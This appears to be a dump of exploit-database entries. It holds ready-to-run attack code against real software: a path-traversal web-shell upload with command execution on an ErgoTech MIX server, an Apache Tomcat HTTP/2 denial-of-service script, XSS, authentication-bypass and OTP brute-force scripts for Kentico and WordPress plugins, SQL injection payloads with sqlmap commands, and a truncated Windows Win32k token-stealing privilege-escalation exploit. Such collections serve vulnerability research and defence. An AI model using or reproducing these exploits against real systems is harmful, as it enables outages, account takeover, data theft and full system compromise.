arbitrary PHP files outside the intended directory scope. When combined,
these issues allow remote attackers to upload a malicious PHP shell
and execute system commands with the privileges of the web server,
leading to full system compromise.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5954
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5954.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl "http://192.168.73.31:7226/servlets/DeploymentServlet\
> ?RequestType=DeploySource\
> &filename=../../../home/MIX_CMIX/htmlroot/zsl.php\
> &directory=/" \
> --data-binary @zsl.php \
> -H "Host: 127.0.0.1" \
> -H "Content-Type: application/octet-stream"
<HTML><HEAD><TITLE>200 Successful</TITLE></HEAD><BODY>200 Successful</BODY></HTML>
$ curl http://192.168.73.31/zsl.php?cmd=id;ls -al zsl.php
uid=48(apache) gid=48(apache) groups=48(apache),0(root) context=system_u:system_r:httpd_t:s0
-rw-r--r--. 1 root root 106 Jun 4 13:29 zsl.php

143
exploits/multiple/remote/52318.py Executable file
View file

@ -0,0 +1,143 @@
# Exploit Title: Apache Tomcat 10.1.39 - Denial of Service (DOS)
# Author: Abdualhadi khalifa
# CVE: CVE-2025-31650
import httpx
import asyncio
import random
import urllib.parse
import sys
import socket
from colorama import init, Fore, Style
init()
class TomcatKiller:
def __init__(self):
self.success_count = 0
self.error_count = 0
self.invalid_priorities = [
\\\"u=-1, q=2\\\",
\\\"u=4294967295, q=-1\\\",
\\\"u=-2147483648, q=1.5\\\",
\\\"u=0, q=invalid\\\",
\\\"u=1/0, q=NaN\\\",
\\\"u=1, q=2, invalid=param\\\",
\\\"\\\",
\\\"u=1, q=1, u=2\\\",
\\\"u=99999999999999999999, q=0\\\",
\\\"u=-99999999999999999999, q=0\\\",
\\\"u=, q=\\\",
\\\"u=1, q=1, malformed\\\",
\\\"u=1, q=, invalid\\\",
\\\"u=-1, q=4294967295\\\",
\\\"u=invalid, q=1\\\",
\\\"u=1, q=1, extra=\\\",
\\\"u=1, q=1; malformed\\\",
\\\"u=1, q=1, =invalid\\\",
\\\"u=0, q=0, stream=invalid\\\",
\\\"u=1, q=1, priority=recursive\\\",
\\\"u=1, q=1, %invalid%\\\",
\\\"u=0, q=0, null=0\\\",
]
async def validate_url(self, url):
try:
parsed_url = urllib.parse.urlparse(url)
if not parsed_url.scheme or not parsed_url.hostname:
raise ValueError(\\\"Invalid URL format. Use http:// or https://\\\")
host = parsed_url.hostname
port = parsed_url.port if parsed_url.port else (443 if parsed_url.scheme == \\\'https\\\' else 80)
return host, port
except Exception:
print(f\\\"{Fore.RED}Error: Invalid URL. Use http:// or https:// format.{Style.RESET_ALL}\\\")
sys.exit(1)
async def check_http2_support(self, host, port):
async with httpx.AsyncClient(http2=True, verify=False, timeout=5, limits=httpx.Limits(max_connections=1000)) as client:
try:
response = await client.get(f\\\"https://{host}:{port}/\\\", headers={\\\"user-agent\\\": \\\"TomcatKiller\\\"})
if response.http_version == \\\"HTTP/2\\\":
print(f\\\"{Fore.GREEN}HTTP/2 supported! Proceeding ...{Style.RESET_ALL}\\\")
return True
else:
print(f\\\"{Fore.YELLOW}Error: HTTP/2 not supported. This exploit requires HTTP/2.{Style.RESET_ALL}\\\")
return False
except Exception:
print(f\\\"{Fore.RED}Error: Could not connect to {host}:{port}.{Style.RESET_ALL}\\\")
return False
async def send_invalid_priority_request(self, host, port, num_requests, task_id):
async with httpx.AsyncClient(http2=True, verify=False, timeout=0.3, limits=httpx.Limits(max_connections=1000)) as client:
url = f\\\"https://{host}:{port}/\\\"
for i in range(num_requests):
headers = {
\\\"priority\\\": random.choice(self.invalid_priorities),
\\\"user-agent\\\": f\\\"TomcatKiller-{task_id}-{random.randint(1, 1000000)}\\\",
\\\"cache-control\\\": \\\"no-cache\\\",
\\\"accept\\\": f\\\"*/*; q={random.random()}\\\",
}
try:
await client.get(url, headers=headers)
self.success_count += 1
except Exception:
self.error_count += 1
async def monitor_server(self, host, port):
while True:
try:
with socket.create_connection((host, port), timeout=2):
print(f\\\"{Fore.YELLOW}Target {host}:{port} is reachable.{Style.RESET_ALL}\\\")
except Exception:
print(f\\\"{Fore.RED}Target {host}:{port} unreachable or crashed!{Style.RESET_ALL}\\\")
break
await asyncio.sleep(2)
async def run_attack(self, host, port, num_tasks, requests_per_task):
print(f\\\"{Fore.GREEN}Starting attack on {host}:{port}...{Style.RESET_ALL}\\\")
print(f\\\"Tasks: {num_tasks}, Requests per task: {requests_per_task}\\\")
print(f\\\"{Fore.YELLOW}Monitor memory manually via VisualVM or check catalina.out for OutOfMemoryError.{Style.RESET_ALL}\\\")
monitor_task = asyncio.create_task(self.monitor_server(host, port))
tasks = [self.send_invalid_priority_request(host, port, requests_per_task, i) for i in range(num_tasks)]
await asyncio.gather(*tasks)
monitor_task.cancel()
total_requests = num_tasks * requests_per_task
success_rate = (self.success_count / total_requests * 100) if total_requests > 0 else 0
print(f\\\"\\\\n{Fore.MAGENTA}===== Attack Summary ====={Style.RESET_ALL}\\\")
print(f\\\"Target: {host}:{port}\\\")
print(f\\\"Total Requests: {total_requests}\\\")
print(f\\\"Successful Requests: {self.success_count}\\\")
print(f\\\"Failed Requests: {self.error_count}\\\")
print(f\\\"Success Rate: {success_rate:.2f}%\\\")
print(f\\\"{Fore.MAGENTA}========================={Style.RESET_ALL}\\\")
async def main():
print(f\\\"{Fore.BLUE}===== TomcatKiller - CVE-2025-31650 ====={Style.RESET_ALL}\\\")
print(f\\\"Developed by: @absholi7ly\\\")
print(f\\\"Exploits memory leak in Apache Tomcat (10.1.10-10.1.39) via invalid HTTP/2 priority headers.\\\")
print(f\\\"{Fore.YELLOW}Warning: For authorized testing only. Ensure HTTP/2 and vulnerable Tomcat version.{Style.RESET_ALL}\\\\n\\\")
url = input(f\\\"{Fore.CYAN}Enter target URL (e.g., https://localhost:8443): {Style.RESET_ALL}\\\")
num_tasks = int(input(f\\\"{Fore.CYAN}Enter number of tasks (default 300): {Style.RESET_ALL}\\\") or 300)
requests_per_task = int(input(f\\\"{Fore.CYAN}Enter requests per task (default 100000): {Style.RESET_ALL}\\\") or 100000)
tk = TomcatKiller()
host, port = await tk.validate_url(url)
if not await tk.check_http2_support(host, port):
sys.exit(1)
await tk.run_attack(host, port, num_tasks, requests_per_task)
if __name__ == \\\"__main__\\\":
try:
asyncio.run(main())
print(f\\\"{Fore.GREEN}Attack completed!{Style.RESET_ALL}\\\")
except KeyboardInterrupt:
print(f\\\"{Fore.YELLOW}Attack interrupted by user.{Style.RESET_ALL}\\\")
sys.exit(0)
except Exception as e:
print(f\\\"{Fore.RED}Unexpected error: {e}{Style.RESET_ALL}\\\")
sys.exit(1)

68
exploits/multiple/webapps/52290.py Executable file
View file

@ -0,0 +1,68 @@
# Exploit Title: Kentico Xperience 13.0.178 - Cross Site Scripting (XSS)
# Date: 2025-05-09
# Version: Kentico Xperience before 13.0.178
# Exploit Author: Alex Messham
# Contact: ramessham@gmail.com
# Source: https://github.com/xirtam2669/Kentico-Xperience-before-13.0.178---XSS-POC/
# CVE: CVE-2025-32370
import requests
import subprocess
import os
import argparse
def create_svg_payload(svg_filename: str):
print(f"[*] Writing malicious SVG to: {svg_filename}")
svg_payload = '''<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full"
xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
<script type="text/javascript">
alert("XSS");
</script>
</svg>
'''
with open(svg_filename, 'w') as f:
f.write(svg_payload)
def zip_payload(svg_filename: str, zip_filename: str):
print(f"[*] Creating zip archive: {zip_filename}")
subprocess.run(['zip', zip_filename, svg_filename], check=True)
def upload_zip(zip_filename: str, target_url: str):
full_url = f"{target_url}?Filename={zip_filename}&Complete=false"
headers = {
"Content-Type": "application/octet-stream"
}
print(f"[+] Uploading {zip_filename} to {full_url}")
with open(zip_filename, 'rb') as f:
response = requests.post(full_url, headers=headers, data=f,
verify=False)
if response.status_code == 200:
print("[+] Upload succeeded")
else:
print(f"[-] Upload failed with status code {response.status_code}")
print(response.text)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="PoC for CVE-2025-2748 -
Unauthenticated ZIP file upload with embedded SVG for XSS.")
parser.add_argument("--url", required=True, help="Target upload URL
(e.g. https://example.com/CMSModules/.../MultiFileUploader.ashx)")
parser.add_argument("--svg", default="poc.svc", help="SVG filename to
embed inside the zip")
parser.add_argument("--zip", default="exploit.zip", help="Name of the
output zip file")
args = parser.parse_args()
create_svg_payload(args.svg)
zip_payload(args.svg, args.zip)
upload_zip(args.zip, args.url)
```

71
exploits/multiple/webapps/52291.py Executable file
View file

@ -0,0 +1,71 @@
# Exploit Title: WordPress Frontend Login and Registration Blocks Plugin 1.0.7 - Privilege Escalation
# Google Dork: inurl:/wp-content/plugins/frontend-login-and-registration-blocks/
# Date: 2025-05-12
# Exploit Author: Md Shoriful Islam (RootHarpy)
# Vendor Homepage: https://wordpress.org/plugins/frontend-login-and-registration-blocks/
# Software Link: https://downloads.wordpress.org/plugin/frontend-login-and-registration-blocks.1.0.7.zip
# Version: <= 1.0.7
# Tested on: Ubuntu 22.04 + WordPress 6.5.2
# CVE : CVE-2025-3605
import requests
import argparse
import sys
def display_banner():
banner = """
_____ _____ ___ __ ___ ___ ____ __ __ ___
/ __\ \ / / __|_|_ ) \_ ) __|__|__ / / / / \| __|
| (__ \ V /| _|___/ / () / /|__ \___|_ \/ _ \ () |__ \
\___| \_/ |___| /___\__/___|___/ |___/\___/\__/|___/
"""
print(banner)
def suppress_ssl_warnings():
requests.packages.urllib3.disable_warnings()
def initialize_session():
new_session = requests.Session()
new_session.verify = False
new_session.headers.update({'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"})
return new_session
def parse_input_args():
parser = argparse.ArgumentParser(description="Exploit for Privilege Escalation in Frontend Login and Registration Plugin <= 1.0.7")
parser.add_argument("--target", "-t", required=True, help="Target URL to exploit")
parser.add_argument("--target_user", "-u", default="1", help="User ID for target (default: 1)")
parser.add_argument("--new_email", "-e", default="example@gmail.com", help="Email to change to (default: example@gmail.com)")
return parser.parse_args()
def generate_payload(user, email):
return {
'action': 'flrblocksusersettingsupdatehandle',
'user_id': user,
'flr-blocks-email-update': email
}
def execute_exploit(session, target_url, payload):
try:
return session.post(f"{target_url}/wp-admin/admin-ajax.php", data=payload)
except Exception as error:
print(f"Request error: {error}")
sys.exit(1)
def process_response(response):
if response.status_code == 200 and response.text.strip() != "0":
print(f"Exploit succeeded! Response: {response.text}")
print("Next: Go to the Forgot Password page and reset the admin password using the new email!")
else:
print(f"Exploit failed. HTTP Status: {response.status_code}, Response: {response.text}")
def run_exploit():
display_banner()
suppress_ssl_warnings()
args = parse_input_args()
session = initialize_session()
payload = generate_payload(args.target_user, args.new_email)
response = execute_exploit(session, args.target, payload)
process_response(response)
if __name__ == "__main__":
run_exploit()

65
exploits/multiple/webapps/52302.py Executable file
View file

@ -0,0 +1,65 @@
#!/usr/bin/env python3
# Exploit Title: WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass
# Date: 2025-05-22
# Exploit Author: Mohammed Idrees Banyamer
# Vendor Homepage: https://wordpress.org/plugins/user-registration/
# Software Link: https://downloads.wordpress.org/plugin/user-registration.4.1.2.zip
# Version: <= 4.1.2
# Tested on: WordPress 6.x, Apache on Linux
# CVE: CVE-2025-2594
import requests
import sys
import argparse
from urllib.parse import urljoin
from termcolor import cprint, colored
def banner():
cprint("┌──────────────────────────────────────────────┐", "cyan")
cprint("│ WordPress Plugin User Registration <= 4.1.2 │", "cyan")
cprint("│ Authentication Bypass Exploit (CVE-2025-2594)│", "cyan")
cprint("│ Author: Mohammed Idrees Banyamer │", "cyan")
cprint("└──────────────────────────────────────────────┘", "cyan")
def exploit(target_url, member_id, nonce):
endpoint = urljoin(target_url, "/wp-admin/admin-ajax.php")
files = {
'action': (None, 'user_registration_membership_confirm_payment'),
'security': (None, nonce),
'form_response': (None, '{"auto_login": true}'),
'member_id': (None, str(member_id))
}
cprint(f"[+] Target URL: {endpoint}", "yellow")
cprint(f"[+] Attempting to bypass authentication as user ID {member_id}...\n", "yellow")
try:
response = requests.post(endpoint, files=files, timeout=10)
if response.status_code == 200 and '"success":true' in response.text:
cprint("[✓] Exploit successful! Authentication bypass achieved.", "green")
cprint("[!] Check your session/cookies - you may now be authenticated as the target user.\n", "green")
print("Server Response:")
print(response.text)
else:
cprint("[-] Exploit failed or invalid nonce/member_id.", "red")
print("Server Response:")
print(response.text)
except requests.exceptions.RequestException as e:
cprint(f"[!] Request failed: {e}", "red")
def main():
banner()
parser = argparse.ArgumentParser(description="CVE-2025-2594 - WordPress Plugin Authentication Bypass")
parser.add_argument("target", help="Base target URL (e.g., http://localhost)")
parser.add_argument("member_id", help="Target user ID (usually 1 for admin)")
parser.add_argument("nonce", help="_confirm_payment_nonce value from registration page")
args = parser.parse_args()
exploit(args.target, args.member_id, args.nonce)
if __name__ == "__main__":
main()

74
exploits/multiple/webapps/52307.txt Normal file
View file

@ -0,0 +1,74 @@
# Exploit Title: WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing
# Google Dork: inurl:/wp-content/plugins/digits/
# Date: 2025-04-30
# Exploit Author: Saleh Tarawneh
# Vendor Homepage: https://digits.unitedover.com/
# Version: < 8.4.6.1
# CVE : CVE-2025-4094
"""
The Digits plugin for WordPress prior to version 8.4.6.1 is vulnerable to OTP brute-force attacks due to missing rate limiting.
An attacker can exploit this to bypass authentication or password reset by iterating over possible OTP values.
This PoC targets the "Forgot Password" flow and automates the attack, which is the same concept that is valid for the registration flow.
CWE-287: Improper Authentication
CVSS v3.1: 9.8 (Critical)
OWASP A2: Broken Authentication
[Instructions]
1. Use a tool like Burp Suite or your browsers developer tools to intercept the OTP verification request.
2. Copy the exact request parameters
3. Replace the placeholder values in the script with real data from the intercepted request.
4. Run the script to brute-force 4-digit OTPs (0000 to 9999) or you can change it to 6-digit.
[Alternative Method Burp Suite Pro]
If you have Burp Suite Pro, you can perform the OTP brute-force attack manually:
1. Intercept the OTP request using Burp Proxy.
2. Send the request to Intruder.
3. Mark the `sms_otp` parameter as the payload position.
4. Load a payload list from `000000` to `999999` (for 6-digit OTPs).
5. Start the attack and monitor responses for a different status code, length, or success message.
"""
import requests
def brute(otp):
url = "https://example.com/wp-admin/admin-ajax.php"
data = { # Replace with targets data
"login_digt_countrycode": "+",
"digits_phone": "000000000",
"action_type": "phone",
"sms_otp": otp,
"otp_step_1": "1",
"instance_id": "xxxxxxx",
"action": "digits_forms_ajax",
"type": "forgot",
"forgot_pass_method": "sms_otp",
"digits": "1",
"digits_redirect_page": "//example.com/",
"digits_form": "xxxxxxxx",
"_wp_http_referer": "/?login=true"
}
headers = {
"User-Agent": "Mozilla/5.0",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest",
"Referer": "https://example.com/?login=true" # Replace with intercepted referer
}
response = requests.post(url, data=data, headers=headers)
if '"success":true' in response.text:
print(f"[+] OTP FOUND: {otp}")
exit()
def main():
for otp in range(0, 10000): # range(0, 1000000): for 6-digit
otp_str = f"{otp:04d}" # {otp:06d} for 6-digit
print(f"[*] Trying OTP: {otp_str}")
brute(otp_str)
if __name__ == "__main__":
main()

72
exploits/multiple/webapps/52312.txt Normal file
View file

@ -0,0 +1,72 @@
# Exploit Title: Campcodes Online Hospital Management System 1.0 - SQL Injection
# Google Dork: N/A
# Exploit Author: Carine Constantino
# Vendor Homepage: https://www.campcodes.com
# Software Link: https://www.campcodes.com/projects/online-hospital-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Linux - Ubuntu Ubuntu 23.10
# CVE: CVE-2025-5298
# Campcodes Online Hospital Management System 1.0 is vulnerable to SQL Injection
# The report in admin/betweendates-detailsreports.php does not validate fromdate and todate fields
# And allows the processing of SQL Injection queries of the types:
# blind time-based in the fromdate field
# boolean-based in the todate field
# Union Query in the todate field
fromdate field is vulnerable to SQL Injection on reports accessed on “/admin/betweendates-detailsreports.php” from POST request
POST /HospitalManagementSystem/hospital/hms/admin/betweendates-detailsreports.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/HospitalManagementSystem/hospital/hms/admin/between-dates-reports.php
Cookie: ajs_anonymous_id=e18be7d3-2b50-4bed-9962-5cfab989426f; PHPSESSID=hfb8j1phivvf11o2j9cd492oqe
Upgrade-Insecure-Requests: 1
Priority: u=0, i
fromdate=&todate=&submit=
=======================================|| Blind Time Based - fromdate field ||==============================================
SQLMap identified the following injection payload:
Parameter: fromdate (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: fromdate=2019-01-01' AND (SELECT 5962 FROM (SELECT(SLEEP(5)))danz) AND 'awPP'='awPP&todate=2025-05-28&submit=
SQLMap first command to confirm the vulnerability: “sqlmap -r request.txt -p fromdate --dbs --random-agent --technique=T”
=======================================|| Boolean Based - todate field ||==============================================
todate field is vulnerable to SQL Injection on reports accessed on “/admin/betweendates-detailsreports.php” from POST request
SQLMap identified the following injection payload:
Parameter: todate (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: fromdate=2019-01-01&todate=2025-05-28' AND 3290=3290 AND 'yOfc'='yOfc&submit=
SQLMap first command to confirm the vulnerability: “sqlmap -r request.txt -p todate --dbs --random-agent --technique=B”
=======================================|| Union Query - todate field ||==============================================
Another technique on todate field can be exploited
SQLMap identified the following injection payload:
Parameter: todate (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: fromdate=2019-01-01&todate=2025-05-28' UNION ALL SELECT CONCAT(CONCAT('qkpxq','eLwmjRlXmPYByrACqjbUDqzOqYmBeKwQSUSMNXdM'),'qzzbq'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ckvh&submit=
SQLMap first command to confirm the vulnerability: “sqlmap -r request.txt -p todate --dbs --random-agent --technique=U”

22
exploits/php/webapps/52314.txt Normal file
View file

@ -0,0 +1,22 @@
# Exploit Title: CloudClassroom PHP Project 1.0 - SQL Injection
# Google Dork: inurl:CloudClassroom-PHP-Project-master
# Date: 2025-05-30
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://github.com/mathurvishal/CloudClassroom-PHP-Project
# Software Link: https://github.com/mathurvishal/CloudClassroom-PHP-Project/archive/refs/heads/master.zip
# Version: 1.0
# Tested on: XAMPP on Windows 10 / Ubuntu 22.04
# CVE : CVE-2025-45542
# Description:
# A time-based blind SQL injection vulnerability exists in the pass parameter
# of the registrationform endpoint. An attacker can exploit this issue by sending
# a malicious POST request to delay server response and infer data.
# PoC Request (simulated using curl):
curl -X POST http://localhost/CloudClassroom-PHP-Project-master/registrationform \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "addrs=3137%20Laguna%20Street&course=1&dob=1967/1/1&email=testing@example.com&faname=test&fname=test&gender=Female&lname=test&pass=u]H[ww6KrA9F.x-F0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z&phno=94102&sub="
# The server response will be delayed if the SQL condition is true, confirming the injection point.

623
exploits/windows/local/52301.c Normal file
View file

@ -0,0 +1,623 @@
# Exploit Title: Microsoft Windows Server 2016 - Win32k Elevation of
Privilege
# Date: 2025-05-19
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Country: United Kingdom
# CVE : CVE-2023-29336
#include <windows.h>
#include <stdio.h>
#include <tchar.h>
#define IDM_MYMENU 101
#define IDM_EXIT 102
#define IDM_DISABLE 0xf120
#define IDM_ENABLE 104
#define EPROCESS_UNIQUE_PROCESS_ID_OFFSET 0x440
#define EPROCESS_ACTIVE_PROCESS_LINKS_OFFSET 0x448
#define EPROCESS_TOKEN_OFFSET 0x4b8
typedef DWORD64(NTAPI* NtUserEnableMenuItem)(HMENU hMenu, UINT
uIDEnableItem, UINT uEnable);
typedef DWORD64(NTAPI* NtUserSetClassLongPtr)(HWND a1, unsigned int a2,
unsigned __int64 a3, unsigned int a4);
typedef DWORD64(NTAPI* NtUserCreateAcceleratorTable)(void* Src, int a2);
typedef DWORD64(NTAPI* fnNtUserConsoleControl)(int nConsoleCommand, PVOID,
int nConsoleInformationLength);
NtUserSetClassLongPtr g_NtUserSetClassLongPtr = NULL;
NtUserEnableMenuItem g_NtUserEnableMenuItem = NULL;
NtUserCreateAcceleratorTable g_NtUserCreateAcceleratorTable = NULL;
fnNtUserConsoleControl g_pfnNtUserConsoleControl = nullptr;
LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM
lParam);
int syytem();
typedef struct _SHELLCODE {
DWORD reserved;
DWORD pid;
DWORD off_THREADINFO_ppi;
DWORD off_EPROCESS_ActiveLink;
DWORD off_EPROCESS_Token;
BOOL bExploited;
BYTE pfnWindProc[];
} SHELLCODE, * PSHELLCODE;
struct tagMENU
{
ULONG64 field_0;
ULONG64 field_8;
ULONG64 field_10;
ULONG64 field_18;
ULONG64 field_20;
PVOID obj28;
DWORD field_30;
DWORD flag1;
DWORD flag2;
DWORD cxMenu;
DWORD cyMenu;
ULONG64 field_48;
PVOID rgItems;
ULONG64 field_58; // + 0x58
ULONG64 field_60;
ULONG64 field_68;
ULONG64 field_70;
ULONG64 field_78;
ULONG64 field_80;
ULONG64 field_88;
ULONG64 field_90;
PVOID ref; // + 0x98
};
struct MyData
{
BYTE name[0x96];
};
tagMENU* g_pFakeMenu = 0;
static PSHELLCODE pvShellCode = NULL;
HMENU hSystemMenu;
HMENU hMenu;
HMENU hSubMenu;
HMENU hAddedSubMenu;
HMENU hMenuB;
PVOID MENU_add = 0;
DWORD flag = 0;
UINT iWindowCount = 0x100;
HWND HWND_list[0x300];
HWND HWND_list1[0x20];
HMENU HMENUL_list[0x300];
int Hwnd_num = 0;
int Hwnd_num1 = 0;
ULONGLONG HWND_add = 0;
ULONGLONG GS_off = 0;
WORD max = 0;
static PULONGLONG ptagWNDFake = NULL;
static PULONGLONG ptagWNDFake1 = NULL;
static PULONGLONG ptagWNDFake2 = NULL;
static PULONGLONG GS_hanlde = NULL;
static PULONGLONG HWND_class = NULL;
struct ThreadParams {
int threadId;
int numLoops;
};
static unsigned long long GetGsValue(unsigned long long gsValue)
{
return gsValue;
}
PVOID
GetMenuHandle(HMENU menu_D)
{
int conut = 0;
PVOID HANDLE = 0;
PBYTE add = 0;
WORD temp = 0;
DWORD offset = 0xbd688;
HMODULE hModule = LoadLibraryA("USER32.DLL");
PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, "IsMenu");
ULONGLONG par1 = 0;
DWORD par2 = 0;
memcpy((VOID*)&par1, (char*)((ULONGLONG)hModule + offset), 0x08);
memcpy((VOID*)&par2, (char*)((ULONGLONG)hModule + offset + 0x08), 0x02);
add = (PBYTE)(par1 + 0x18 * (WORD)menu_D);
if (add)
{
HANDLE = *(PVOID*)add;
}
else
{
HANDLE = 0;
}
HANDLE= (PVOID*)((ULONGLONG)HANDLE - GS_off+0x20);
return *(PVOID*)HANDLE;
}
PVOID
xxGetHMValidateHandle(HMENU menu_D, DWORD type_hanlde)
{
int conut = 0;
PVOID HANDLE = 0;
PBYTE add = 0;
WORD temp = 0;
DWORD offset = 0xbd688;
HMODULE hModule = LoadLibraryA("USER32.DLL");
PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, "IsMenu");
ULONGLONG par1 = 0;
DWORD par2 = 0;
memcpy((VOID*)&par1, (char*)((ULONGLONG)hModule + offset), 0x08);
memcpy((VOID*)&par2, (char*)((ULONGLONG)hModule + offset + 0x08), 0x02);
temp = (ULONGLONG)menu_D >> 16;
add = (PBYTE)(par1 + 0x18 * (WORD)menu_D);
if (add)
{
HANDLE = *(PVOID*)add;
}
else
{
HANDLE = 0;
}
HANDLE = (PVOID*)((ULONGLONG)HANDLE - GS_off + 0x20);
return *(PVOID*)HANDLE;
}
static
VOID
xxReallocPopupMenu(VOID)
{
for (INT i = 0; i < 0x8; i++)
{
WNDCLASSEXW Class = { 0 };
WCHAR szTemp[0x100] = { 0 };
HWND hwnd = NULL;
wsprintfW(szTemp,
L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@A%d",
i);
Class.cbSize = sizeof(WNDCLASSEXA);
Class.lpfnWndProc = DefWindowProcW;
Class.cbWndExtra = 0;
Class.hInstance = GetModuleHandleA(NULL);
Class.lpszMenuName = NULL;
Class.lpszClassName = szTemp;
if (!RegisterClassExW(&Class))
{
continue;
}
}
}
VOID
createclass(VOID)
{
WCHAR szTemp[0x100] = { 0 };
for (INT i = 9; i < 29; i++)
{
WNDCLASSEXW Class = { 0 };
HWND hwnd = NULL;
wsprintfW(szTemp, L"A@A%d", i);
Class.cbSize = sizeof(WNDCLASSEXA);
Class.lpfnWndProc = DefWindowProcW;
Class.cbWndExtra = 0x20;
Class.hInstance = GetModuleHandleA(NULL);
Class.lpszMenuName = NULL;
Class.lpszClassName = szTemp;
Class.cbClsExtra = 0x1a0;
if (!RegisterClassExW(&Class))
{
continue;
}
}
for (INT i = 9; i < 29; i++)
{
wsprintfW(szTemp, L"A@A%d", i);
HWND_list1[i]=CreateWindowEx(NULL, szTemp, NULL, WS_VISIBLE, 0, 0,
0, 0, NULL,NULL, NULL, NULL);
}
}
ULONG64 Read64(ULONG64 address)
{
MENUBARINFO mbi = { 0 };
mbi.cbSize = sizeof(MENUBARINFO);
g_pFakeMenu->rgItems = PVOID(address - 0x48);
GetMenuBarInfo(HWND_list[max+1], OBJID_MENU, 1, &mbi);
return (unsigned int)mbi.rcBar.left + ((ULONGLONG)mbi.rcBar.top << 32);
}
void exploit()
{
for (int i = 0; i < 0x20; i++)
{
ULONG64 pmenu = SetClassLongPtr(HWND_list1[i], 0x270,
(LONG_PTR)g_pFakeMenu);
if (pmenu != 0)
{
Hwnd_num = i;
MENUBARINFO mbi = { 0 };
mbi.cbSize = sizeof(MENUBARINFO);
}
}
// Token stealing
ULONG64 p = Read64(HWND_add +0x250+ 0x10); // USER_THREADINFO
p = Read64(p); //THREADINFO
p = Read64(p + 0x220); // (PROCESSINFO)
